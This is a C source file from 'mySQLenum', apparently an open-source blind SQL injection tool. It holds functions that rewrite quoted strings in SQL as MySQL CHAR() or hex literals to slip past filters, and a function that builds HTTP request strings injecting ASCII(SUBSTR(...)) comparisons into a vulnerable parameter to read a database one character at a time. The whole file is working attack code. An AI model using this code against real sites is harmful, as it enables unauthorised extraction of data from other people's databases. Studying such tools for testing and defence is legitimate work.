/*
 * mySQLenum
 *  
 * Copyright (C) 2009 Andrea Fabrizi <andrea.fabrizi@gmail.com>
 *  
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *  
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *  
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 *
 */
#include <stdio.h>
#include <sys/types.h> 
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <ctype.h>
#include "mysqlenum.h"


/*
 * Encode the first string (enclosed by '') in the sql query with mySql CHAR function
 * or using hex encoding
 *
 * Returns:
 * OK: encoded query
 * KO: NULL
 */
char *char_encode_string(const char *buffer, const int encoding)
{   
    char *start_quote,
         *end_quote,
         *string,
         *enc_string,
         *enc_query;
    int string_len,
        enc_string_len,
        i,
        n = 0;
                  
    /* locating the fist ' (if exists) */
    start_quote = strchr(buffer, '\'');
    if (start_quote != NULL)
    {
        /* locating the second ' (if exists) */
        end_quote = strchr(start_quote+1, '\'');
        if (end_quote != NULL)
        {
            /* extract the string to be converted (included quotes) */
            string_len = end_quote - start_quote + 1;
            string = malloc(string_len + 1);
            bzero(string, string_len + 1);
            strncpy(string, start_quote, string_len);
                       
            enc_string_len = string_len * 5 + 6;
            enc_string = malloc(enc_string_len);
            bzero(enc_string,enc_string_len);
            
            /* encode the string with mySql CHAR function */
            if (encoding == 1)
            {
                strncpy(enc_string, "CHAR(", 5);
                n = 5;
                for (i=1; i<string_len-1; i++) 
                {
                    n = n + snprintf(enc_string + n, 4, "%d", string[i]);
                    if (i<string_len-2)
                    { 
                        strncat(enc_string,",",1);
                        n++;
                    }
                }
            
                strncat(enc_string,")",1);
            }
            
            /* encode the string using hex encoding */
            else
            {
                strncpy(enc_string, "0x", 2);
                n = 2;
                for (i=1; i<string_len-1; i++) 
                    n = n + snprintf(enc_string + n, 4, "%2x", string[i]);
            }
           
            enc_query = str_replace(string, enc_string, buffer);
            
            free(string);
            free(enc_string);

            return enc_query;
        }
        else
            return NULL;
    }
    else
        return NULL;
}


/*
 * Encode ALL the strings (enclosed by '') in the sql query with mySql CHAR function
 *
 * Riturns:
 * OK: encoded query
 * KO: NULL
 */
char *char_encode_strings(const char *buffer, const int encoding)
{
    char *enc_query,
         *enc_query_ptr;
 
    enc_query = (char *)buffer;
    while(1)
    {   
        enc_query_ptr = enc_query;
        enc_query = char_encode_string(enc_query_ptr, encoding);

        if (enc_query == NULL)
            break;
        
        if (enc_query_ptr != buffer) 
            free(enc_query_ptr);
    }

    if (buffer == enc_query_ptr)
        enc_query_ptr = strdup(buffer);

    return enc_query_ptr;
}

/*
 * Build an HTTP request with blind SQL injection
 * refered to a single carachter (end_chr = -1) or to a range (end_chr > 0)
 */
char *build_injection_request(struct configuration *conf, const char *query, unsigned int pos, char start_chr, char end_chr)
{
    char *request;
    
    /* single character check */
    if (end_chr == -1)
    {
        asprintf(&request, "%s&%s and (ASCII(SUBSTR((%s),%d,1))=0x%x) %s ", 
        conf->otherparams, conf->vulnparam, query, pos, start_chr,conf->queryappend);
    }
    else

    /* range characters check */
    { 
        asprintf(&request, "%s&%s and ((ASCII(SUBSTR((%s),%d,1))>=0x%x) and (ASCII(SUBSTR((%s),%d,1))<0x%x)) %s ", 
        conf->otherparams, conf->vulnparam, query, pos, start_chr, query, pos, end_chr, conf->queryappend);
    }

    return request;
}
